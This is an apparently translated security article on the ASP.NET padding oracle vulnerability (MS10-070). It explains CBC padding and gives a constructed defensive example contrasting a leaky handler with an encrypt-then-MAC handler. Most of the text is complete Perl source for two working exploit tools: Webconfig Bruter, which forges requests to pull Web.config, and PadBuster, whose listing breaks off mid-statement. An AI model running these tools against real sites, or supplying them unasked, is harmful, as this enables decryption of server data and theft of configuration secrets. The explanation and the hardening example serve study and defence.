Padding Oracle

1. Vulnerability Overview


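Padding oracle, also known as MS10-070, is an information disclosure vulnerability in ASP.NET caused by improper error handling during encryption padding verification. An attacker who successfully exploits it can read data encrypted by the server, such as view state. The vulnerability can also be used for data tampering: if successfully exploited, it can be used to decrypt and tamper with data encrypted by the server. Although an attacker cannot use this vulnerability to execute malicious code or directly elevate their user privileges, it can be used for information gathering, and that information can be used to further attack the affected system.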

2. Root Cause


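In a symmetric encryption algorithm, the ciphertext is the result of processing the key and the plaintext with the encryption algorithm. Encryption is performed block by block, as in DES, RC2 and similar algorithms. Each block is a fixed n (8, 16, 32) bits; when there is a remainder, it is generally filled up according to some rule, which is the so-called padding. The commonly used PKCS#5 rule, for example, chooses the padding content according to the length missing from the last data block. To strengthen the encryption, the ciphertext of the previous block is mixed into the data of the next block before it is encrypted, and so on; what is mixed into the first block is a pre-generated IV (initialization vector).

Encryption algorithms operate on equal-length "data blocks" (for RC2, DES or TripleDES this length is 8 bytes, while for Rijndael it is 16, 24 or 32 bytes). Our input data, however, has an irregular length, so it must be padded to form complete blocks. With such a rule, the length of the padding can be determined from the padding content, so that the padding bytes can be removed after decryption.

A ciphertext is also decrypted block by block. After decryption completes, the algorithm first checks whether the result conforms to the rule; if the padding does not conform, the input data is considered faulty. Decryption libraries typically throw a PaddingError exception in this case, indicating that the padding is incorrect.

In a padding oracle attack, the attacker needs only one valid ciphertext. The attacker repeatedly sends tampered ciphertexts to the website (this process is mainly one of constructing the IV) and observes whether a padding error is reported. The error may be displayed directly in the web page, or it may only be an HTTP status code; comparing two different HTTP status codes is enough, and no other detail is needed. If such an error indication exists, the attacker can keep supplying ciphertexts to the site, let the decryption routine report errors, and keep correcting them, finally obtaining the intermediate ciphertext that exists before the mixing step. Once the intermediate ciphertext is known, an IV can be constructed so that the plaintext obtained after the intermediate ciphertext is un-mixed is the specified content, which achieves the goal of the attack. In this process the padding oracle attack does not break the encryption key, nor is it able to decrypt arbitrary ciphertexts; it only uses one valid ciphertext to produce a forged ciphertext that decrypts to any specified plaintext.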
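The root cause described above, shown from the defender's side as an added example (not code from the original page or from either tool): a CBC handler whose padding failure is visible as a distinct status, next to an encrypt-then-MAC handler that rejects every tampered token with the same status before decrypting. The toy Feistel cipher, keys, status codes and function names are constructed assumptions; the cipher only stands in for DES/AES because the Python standard library ships no block cipher.

```python
import hashlib
import hmac

BLOCK = 8  # block size in bytes of the constructed toy cipher below
ENC_KEY = b"constructed-enc-key"   # sample keys, constructed for this example
MAC_KEY = b"constructed-mac-key"
IV = bytes(range(BLOCK))           # fixed IV only so the example is repeatable


class PaddingError(Exception):
    """Raised when decrypted data does not end in valid PKCS#7 padding."""


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def round_fn(key, half, rnd):
    # Round function of the toy Feistel cipher (a stand-in, not secure).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]


def encrypt_block(key, block):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        left, right = right, xor(left, round_fn(key, right, rnd))
    return left + right


def decrypt_block(key, block):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(4)):
        left, right = xor(right, round_fn(key, left, rnd)), left
    return left + right


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError("invalid padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    padded, prev, out = pad(plaintext), iv, [iv]
    for i in range(0, len(padded), BLOCK):
        prev = encrypt_block(key, xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, blob):
    if len(blob) < 2 * BLOCK or len(blob) % BLOCK:
        raise PaddingError("bad length")
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    plain = b"".join(xor(decrypt_block(key, c), p)
                     for p, c in zip(blocks, blocks[1:]))
    return unpad(plain)


def leaky_handler(blob):
    """Weak form: a padding failure gets its own status code."""
    try:
        cbc_decrypt(ENC_KEY, blob)
    except PaddingError:
        return 500
    return 200


def seal(plaintext):
    """Encrypt, then append an HMAC-SHA256 tag over IV and ciphertext."""
    blob = cbc_encrypt(ENC_KEY, IV, plaintext)
    return blob + hmac.new(MAC_KEY, blob, hashlib.sha256).digest()


def hardened_handler(token):
    """Hardened form: verify the tag first, one status for every failure."""
    blob, tag = token[:-32], token[-32:]
    expected = hmac.new(MAC_KEY, blob, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return 400
    try:
        cbc_decrypt(ENC_KEY, blob)
    except PaddingError:
        return 400
    return 200


def distinct_responses(handler, token, offset):
    """Statuses returned when one byte of a valid token is altered."""
    seen = set()
    for value in range(256):
        if value == token[offset]:
            continue  # skip the untouched, valid token
        tampered = bytearray(token)
        tampered[offset] = value
        seen.add(handler(bytes(tampered)))
    return seen


def demo():
    offset = BLOCK - 1  # last byte of the IV block
    leaky = distinct_responses(leaky_handler, cbc_encrypt(ENC_KEY, IV, b"id=42"), offset)
    hardened = distinct_responses(hardened_handler, seal(b"id=42"), offset)
    return leaky, hardened


if __name__ == "__main__":
    print(demo())
```

Two distinct statuses from the weak handler are exactly the signal the text describes; the hardened handler yields a single status for every altered token, so nothing about the padding can be inferred.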

3. Vulnerability Detection and Exploitation


The tools used for detection and exploitation are padBuster.pl and Webconfig Bruter.pl.

Webconfig Bruter.pl

# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
 
#!/usr/bin/perl
#
#
#  Webconfig Bruter - exploit tool for downloading Web.config
#
#  To use this script you need PadBuster.
#  Padbuster is a great tool and Brian Holyfield deserves all the credit.
#  Note from Exploit-db: This very first exploit was meant to work with Padbusterdotnet or Padbuster v0.2.
#  A similar exploitation vector was also added lately in Padbuster v0.3:
#  http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
#  http://www.exploit-db.com/sploits/padBuster.pl
#
#
#  Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#   
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
# Read the three positional arguments (each variable is declared once)
my $testUrl = $ARGV[0]."\?d\=";
my $sampleBytes = $ARGV[1];
my $blockSize = $ARGV[2];
if ($#ARGV < 2) {
 die "   
  Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize
  Where: URL = The target URL (and query string if applicable)
         EncryptedSample = The encrypted value you want to use.
         This need to come from Padbuster.
         BlockSize = The block size being used by the algorithm (8 or 16)
         Poc code by giorgio.fedon\@mindedsecurity.com
  Original Padbuster code from Brian Holyfield - Gotham Digital Science
 
Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd  d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
 
";}
 
my $method = "GET";
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = "\x00" x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
  while ($status)
  {
   # Fuzz the test bytes
   for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
   {
   substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
                  }     
 
                   # Combine the test bytes and the sample
   my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
   chomp($combinedTestBytes);
   $combinedTestBytes =~ s/\%0A//g;
   # Ok, now make the request
   my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes);
   if ($status == "200")
   {
   # Remove this for "T" exploit
   if (index($content,"parent\.Sys\.Application") == -1)
   {
   print $content."\n\n";
   print "Total Requests:".$counter."\n\n";
   print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
   last;
   }
   }
   $counter++;
   }
# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder
{
my ($toEncodeDecode, $oper) = @_;
 # UrlDecoder Encoder
 if ($oper == 1)
   {
$toEncodeDecode =~ s/\-/\+/g;
$toEncodeDecode =~ s/\_/\//g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.("=" x int($count));
$returnVal = decode_base64($toEncodeDecode);
   }
   else
   {
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(\r|\n)//g;
$b64Encoded =~ s/\+/\-/g;
$b64Encoded =~ s/\//\_/g;
my $count = $b64Encoded =~ s/\=//g;
($count eq "") ? ($count = 0) : "";
$returnVal = $b64Encoded.$count;
   }
 
 return $returnVal;
}
sub makeRequest {
 my ($method, $url) = @_;
 my ($lwp, $status, $content, $req, $location, $contentLength);  
 
 # Setup LWP UserAgent
 $lwp = LWP::UserAgent->new(env_proxy => 1,
                            keep_alive => 1,
                            timeout => 30,
       requests_redirectable => [],
                            );
 
 $req = new HTTP::Request $method => $url;
 
 my $response = $lwp->request($req);
 
 # Extract the required attributes from the response
 $status = substr($response->status_line, 0, 3);
 $content = $response->content;
 #print $content;
 $location = $response->header("Location");
 if ($location eq "")
 {
  $location = "N/A";
 }
 $contentLength = $response->header("Content-Length");
 return ($status, $content, $location, $contentLength);
}

padBuster.pl

#!/usr/bin/perl
#
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
# Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com)
#
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
# to James M. Martin ([email protected]) for sharing proof of concept exploit
# code for performing various brute force attack techniques, and wireghoul (Eldar 
# Marcussen) for making code quality improvements.  
# 
 
use LWP::UserAgent;
use strict;
use warnings;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
use Time::HiRes qw( gettimeofday );
use Compress::Zlib;
use Crypt::SSLeay;
 
# Set defaults with $variable = value
my $logFiles;
my $post;
my $encoding = 0;
my $headers;
my $cookie;
my $error;
my $prefix;
my $intermediaryInput;
my $cipherInput;
my $plainTextInput;
my $encodedPlainTextInput;
my $noEncodeOption;
my $superVerbose;
my $proxy;
my $proxyAuth;
my $noIv;
my $auth;
my $resumeBlock;
my $interactive = 0;
my $bruteForce;
my $ignoreContent;
my $useBody;
my $verbose;
 
GetOptions( "log" => \$logFiles,
            "post=s" => \$post,
            "encoding=s" => \$encoding,
            "headers=s" => \$headers,
            "cookies=s" => \$cookie,
            "error=s" => \$error,
            "prefix=s" => \$prefix,
            "intermediate=s" => \$intermediaryInput,
            "ciphertext=s" => \$cipherInput,
            "plaintext=s" => \$plainTextInput,
	    "encodedtext=s" => \$encodedPlainTextInput,
            "noencode" => \$noEncodeOption,
            "veryverbose" => \$superVerbose,
            "proxy=s" => \$proxy,
            "proxyauth=s" => \$proxyAuth,
            "noiv" => \$noIv,
            "auth=s" => \$auth,
            "resume=s" => \$resumeBlock,
            "interactive" => \$interactive,
            "bruteforce" => \$bruteForce,
            "ignorecontent" => \$ignoreContent,
            "usebody" => \$useBody,
            "verbose" => \$verbose);
 
print "\n+-------------------------------------------+\n";
print "| PadBuster - v0.3.3                        |\n";
print "| Brian Holyfield - Gotham Digital Science  |\n";
print "| labs\@gdssecurity.com                      |\n";
print "+-------------------------------------------+\n";
 
if ($#ARGV < 2) { 
 die "    
    Use: padBuster.pl URL EncryptedSample BlockSize [options]
  Where: URL = The target URL (and query string if applicable)
         EncryptedSample = The encrypted value you want to test. Must
                           also be present in the URL, PostData or a Cookie
         BlockSize = The block size being used by the algorithm
Options:
	 -auth [username:password]: HTTP Basic Authentication 
	 -bruteforce: Perform brute force against the first block 
	 -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
         -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
         -encoding [0-4]: Encoding Format of Sample (Default 0)
                          0=Base64, 1=Lower HEX, 2=Upper HEX
                          3=.NET UrlToken, 4=WebSafe Base64
         -encodedtext [Encoded String]: Data to Encrypt (Encoded)
         -error [Error String]: Padding Error Message
         -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
	 -interactive: Prompt for confirmation on decrypted bytes
	 -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
	 -log: Generate log files (creates folder PadBuster.DDMMYY)
	 -noencode: Do not URL-encode the payload (encoded by default)
	 -noiv: Sample does not include IV (decrypt first block) 
         -plaintext [String]: Plain-Text to Encrypt
         -post [Post Data]: HTTP Post Data String
	 -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) 
	 -proxy [address:port]: Use HTTP/S Proxy
	 -proxyauth [username:password]: Proxy Authentication
	 -resume [Block Number]: Resume at this block number
	 -usebody: Use response body content for response analysis phase
         -verbose: Be Verbose
         -veryverbose: Be Very Verbose (Debug Only)
 
";}
 
# Ok, if we've made it this far we are ready to begin..
my $url = $ARGV[0];
my $sample = $ARGV[1];
my $blockSize = $ARGV[2];
 
if ($url eq "" || $sample eq "" || $blockSize eq "") {
	print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";
	exit();
}
 
# Hard Coded Inputs
#$post = "";
#$sample = "";
 
my $method = $post ? "POST" : "GET";
 
# These are file related variables
my $dirName = "PadBuster." . &getTime("F");
my $dirSlash = "/";
my $dirCmd = "mkdir ";
if (defined($ENV{'OS'})) {
 if ($ENV{OS} =~ /Windows/) {
  $dirSlash = "\\";
  $dirCmd = "md ";
 }
}
my $dirExists = 0;
my $printStats = 0;
my $requestTracker = 0;
my $timeTracker = 0;
 
if ($encoding < 0 || $encoding > 4) {
	print "\nERROR: Encoding must be a value between 0 and 4\n";
	exit();
} 
my $encodingFormat = $encoding ? $encoding : 0;
 
my $encryptedBytes = $sample;
my $totalRequests = 0;
 
# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem)
if ($sample =~ /\%/) {
	$encryptedBytes = &uri_unescape($encryptedBytes)
}
 
# Prep the sample for regex use
$sample = quotemeta $sample;
 
# Now decode
$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);
if ( (length($encryptedBytes) % $blockSize) > 0) {
	print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n";
	print "       Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n";
	exit();
}
 
# If no IV, then append nulls as the IV (only if decrypting)
if ($noIv && !$bruteForce && !$plainTextInput) {
	$encryptedBytes = "\x00" x $blockSize . $encryptedBytes;
}
 
# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)
my $plainTextBytes;
 
# This is a bool to make sure we know where to replace the sample string
my $wasSampleFound = 0;
 
# ForgedBytes is where the complete forged sample will be stored (encrypt only)
my $forgedBytes;
 
# Isolate the IV into a separate byte array
my $ivBytes = substr($encryptedBytes, 0, $blockSize);
 
# Declare some optional elements for storing the results of the first test iteration
# to help the user if they don't know what the padding error looks like
my @oracleCantidates;
my $oracleSignature = "";
my %oracleGuesses;
my %responseFileBuffer;
 
# The block count should be the sample divided by the blocksize
my $blockCount = int(length($encryptedBytes)) / int($blockSize);
 
if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
	print "\nERROR: There is only one block. Try again using the -noiv option.\n";
	exit();
}
 
# The attack works by sending in a real cipher text block along with a fake block in front of it
# You only ever need to send two blocks at a time (one real one fake) and just work through
# the sample one block at a time
 
 
# First, re-issue the original request to let the user know if something is potentially broken
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie);
 
&myPrint("\nINFO: The original request returned the following",0);
&myPrint("[+] Status: $status",0);	
&myPrint("[+] Location: $location",0);
&myPrint("[+] Content Length: $contentLength\n",0);
&myPrint("[+] Response: $content\n",1);
 
$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput;
 
if ($bruteForce) {
	&myPrint("INFO: Starting PadBuster Brute Force Mode",0);
	my $bfAttempts = 0;
 
	print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;
 
	# Only loop through the first 3 bytes...this should be enough as it 
	# requires 16.5M+ requests
 
	my @bfSamples;
	my $sampleString = "\x00" x 2;
	for my $c (0 ... 255) {
	 substr($sampleString, 0, 1, chr($c));
	 for my $d (0 ... 255) {
	  substr($sampleString, 1, 1, chr($d));
	  push (@bfSamples, $sampleString);
	 }
	}
 
	foreach my $testVal (@bfSamples) {
	 my $complete = 0;
	 while ($complete == 0) {
	  my $repeat = 0;
	  for my $b (0 ... 255) {
  	   $bfAttempts++;  	   
  	   if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
		   #SKIP
	   } else {
		   my $testBytes = chr($b).$testVal;
		   $testBytes .= "\x00" x ($blockSize-3);
 
		   my $combinedBf = $testBytes;  
		   $combinedBf .= $encryptedBytes;
		   $combinedBf = &myEncode($combinedBf, $encoding);
 
		   # Add the Query String to the URL
		   my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);  	  
 
 
		   # Issue the request
		   my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
 
		   my $signatureData = "$status\t$contentLength\t$location";
		   $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
 
		   if ($oracleSignature eq "") {
			&myPrint("[+] Starting response analysis...\n",0) if ($b ==0);
			$oracleGuesses{$signatureData}++;
			$responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
			if ($b == 255) {
				&myPrint("*** Response Analysis Complete ***\n",0);
				&determineSignature();
				$printStats = 1;
				$timeTracker = 0;
				$requestTracker = 0;
				$repeat = 1;
				$bfAttempts = 0;
			}
		   }
		   if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {
			&myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0);
			&writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content");
		   }
	   }
	  }
	  ($repeat == 1) ? ($complete = 0) : ($complete = 1);
	 } 
	}  
} elsif ($plainTextInput) {
	# ENCRYPT MODE
	&myPrint("INFO: Starting PadBuster Encrypt Mode",0);
 
	# The block count will be the plaintext divided by blocksize (rounded up)	
	my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
	&myPrint("[+] Number of Blocks: ".$blockCount."\n",0);
 
	my $padCount = ($blockSize * $blockCount) - length($plainTextInput);	
	$plainTextInput.= chr($padCount) x $padCount;
 
	# SampleBytes is the encrypted text you want to derive intermediate values for, so 
	# copy the current ciphertext block into sampleBytes
	# Note, nulls are used if not provided and the intermediate values are brute forced
 
	$forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
	my $sampleBytes = $forgedBytes;
 
	for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) { 	
		# IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored
		my $intermediaryBytes;
 
		if ($intermediaryInput && $blockNum == $blockCount) {
			$intermediaryBytes = &myDecode($intermediaryInput,2);
		} else {
			$intermediaryBytes = &processBlock($sampleBytes);
		}
 
	        # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block
	        # This will become the next ciphertext block (or IV if the last one)
	        $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize);
		$forgedBytes = $sampleBytes.$forgedBytes;
 
		&myPrint("\nBlock ".($blockNum)." Results:",0);
		&myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
		&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);
 
	}
	$forgedBytes = &myEncode($forgedBytes, $encoding);
	chomp($forgedBytes);
} else {
	# DECRYPT MODE
	&myPrint("INFO: Starting PadBuster Decrypt Mode",0);
 
	if ($resumeBlock) {
		&myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
	} else {
		$resumeBlock = 1
	}
 
	# Assume that the IV is included in our sample and that the first block is the IV	
	for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) { 
		# Since the IV is the first block, our block count is artificially inflated by one
		&myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0);
 
		# SampleBytes is the encrypted text you want to break, so 
		# lets copy the current ciphertext block into sampleBytes
		my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize);
 
		# IntermediaryBytes is where the intermediary bytes produced by the algorithm are stored
		my $intermediaryBytes = &processBlock($sampleBytes);
 
		# DecryptedBytes is where the decrypted block is stored
		my $decryptedBytes;			        	
 
		# Now we XOR the decrypted byte with the corresponding byte from the previous block
		# (or IV if we are in the first block) to get the actual plain-text
		$blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize);
 
		&myPrint("\nBlock ".($blockNum-1)." Results:",0);
		&myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
		&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0);
		&myPrint("[+] Plain Text: $decryptedBytes\n",0);
		$plainTextBytes = $plainTextBytes.$decryptedBytes;
	}
}
 
&myPrint("-------------------------------------------------------",0);	
&myPrint("** Finished ***\n", 0);
if ($plainTextInput) {
	&myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0);
} else {	
	&myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0);
	&myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0);
	&myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0);
}
&myPrint("-------------------------------------------------------\n",0);	
 
sub determineSignature { 
	# Help the user detect the oracle response if an error string was not provided
	# This logic will automatically suggest the response pattern that occurred most often 
	# during the test as this is the most likely one
 
	my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses; 
 
	&myPrint("The following response signatures were returned:\n",0);
	&myPrint("-------------------------------------------------------",0);
	if ($useBody) {
		&myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0);
	} else 	{
		&myPrint("ID#\tFreq\tStatus\tLength\tLocation",0);
	}
	&myPrint("-------------------------------------------------------",0);
 
	my $id = 1;
 
	foreach (@sortedGuesses) {
		my $line = $id;
		($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.="";
		my @sigFields = split("\t", $_);
		$line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]";
		$useBody ? ( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.="";
		$line .= "\t$sigFields[2]";
		&myPrint($line,0);
		&writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_});
		$id++;
	}
	&myPrint("-------------------------------------------------------",0);	
 
	if ($#sortedGuesses == 0 && !$bruteForce) {
		&myPrint("\nERROR: All of the responses were identical.\n",0);
		&myPrint("Double check the Block Size and try again.",0);
		exit();
	} else {
		my $responseNum = &promptUser("\nEnter an ID that matches the error condition\nNOTE: The ID# marked with ** is recommended");
		&myPrint("\nContinuing test with selection $responseNum\n",0);
		$oracleSignature = $sortedGuesses[$responseNum-1];
	}
}
 
sub prepRequest {
	my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_;
 
	# Prepare the request			
	my $testUrl = $pUrl;
	my $wasSampleFound = 0;
 
	if ($pUrl =~ /$pSample/) {
		$testUrl =~ s/$pSample/$pTestBytes/;
		$wasSampleFound = 1;
	} 
 
	my $testPost = "";						
	if ($pPost) {
		$testPost = $pPost;
		if ($pPost =~ /$pSample/) {
			$testPost =~ s/$pSample/$pTestBytes/;
			$wasSampleFound = 1;
		}
	}
 
	my $testCookies = "";
	if ($pCookie) {
		$testCookies = $pCookie;
		if ($pCookie =~ /$pSample/) {
			$testCookies =~ s/$pSample/$pTestBytes/;
			$wasSampleFound = 1;
		}
	}
 
	if ($wasSampleFound == 0) {
		&myPrint("ERROR: Encrypted sample was not found in the test request",0);
		exit();
	}
	return ($testUrl, $testPost, $testCookies);
}
 
sub processBlock {
  	my ($sampleBytes) = @_; 
  	my $analysisMode;
  	# Analysis mode is either 0 (response analysis) or 1 (exploit)  	
  	$analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;
 
  	# The return value of this subroutine is the intermediate text for the block
	my $returnValue;
 
  	my $complete = 0;
  	my $autoRetry = 0;
  	my $hasHit = 0;
 
  	while ($complete == 0) {
  		# Reset the return value
  		$returnValue = "";
 
  		my $repeat = 0;
 
		# TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack
		my $testBytes = "\x00" x $blockSize;
 
		my $falsePositiveDetector = 0;
 
		# Work on one byte at a time, starting with the last byte and moving backwards
		OUTERLOOP:
		for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
			INNERLOOP:
			for (my $i = 255; $i >= 0; $i--) {			
				# Fuzz the test byte
				substr($testBytes, $byteNum, 1, chr($i));
 
				# Combine the test bytes and the sample
				my $combinedTestBytes = $testBytes.$sampleBytes;
 
				if ($prefix) {
					$combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes 
				}
 
				$combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);				
				chomp($combinedTestBytes);
 
				if (! $noEncodeOption) {
					$combinedTestBytes = &uri_escape($combinedTestBytes); 
				}
 
				my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);
 
				# Ok, now make the request
 
				my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
 
 
				my $signatureData = "$status\t$contentLength\t$location";
				$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
 
				# If this is the first block and there is no padding error message defined, then cycle through 
				# all possible requests and let the user decide what the padding error behavior is.
				if ($analysisMode == 0) {
					&myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);
					$oracleGuesses{$signatureData}++;
 
					$responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
 
					if ($byteNum == $blockSize - 1 && $i == 0) {
						&myPrint("*** Response Analysis Complete ***\n",0);
						&determineSignature();
						$analysisMode = 1;
						$repeat = 1;
						last OUTERLOOP;
					}
				}
 
				my $continue = "y";
 
				if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
					# This is for autoretry logic (only works on the first byte)
					if ($autoRetry == 1 &&  ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
						$hasHit++;
					} else {
						# If there was no padding error, then it worked
						&myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
						&myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);
 
						# If continually getting a hit on attempt zero, then something is probably wrong
						$falsePositiveDetector++ if ($i == 255);
 
						if ($interactive == 1) {
							$continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);
						}
 
						if ($continue eq "y" || $continue eq "a") {
							$interactive = 0 if ($continue eq "a");
 
							# Next, calculate the decrypted byte by XORing it with the padding value
							my ($currentPaddingByte, $nextPaddingByte);
 
							# These variables could allow for flexible padding schemes (for now PKCS)
							# For PKCS#7, the padding block is equal to chr($blockSize - $byteNum)
							$currentPaddingByte = chr($blockSize - $byteNum);
							$nextPaddingByte = chr($blockSize - $byteNum + 1);
 
							my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;
							&myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);
 
							$returnValue = $decryptedByte.$returnValue;
							&myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);
 
							# Finally, update the test bytes in preparation for the next round, based on the padding used 
							for (my $k = $byteNum; $k < $blockSize; $k++) {
								# First, XOR the current test byte with the padding value for this round to recover the decrypted byte
								substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));				
 
								# Then, XOR it again with the padding byte for the next round
								substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
							}
							last INNERLOOP;                        
						}
 
					}
				}
 
				## TODO: Combine these two blocks?
				if ($i == 0 && $analysisMode == 1) {
					# End of the road with no success.  We should probably try again.
					&myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);
 
					if ($autoRetry == 0) {
						$autoRetry = 1;
						&myPrint("       Automatically trying one more time...",0);
						$repeat = 1;
						last OUTERLOOP;
 
					} else {
						if (($byteNum == $blockSize - 1) && ($error)) {
							&myPrint("\nAre you sure you specified the correct error string?",0);
							&myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
						} 
 
						$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
						if ($continue ne "n") {
							&myPrint("INFO: Switching to interactive mode",0);
							$interactive = 1;
							$repeat = 1;
							last OUTERLOOP;
						}					
					}
				}   
				if ($falsePositiveDetector == $blockSize) {
					&myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
					&myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
					if ($error) {
						&myPrint("[+] Check the error string you provided and try again, or consider running",0);
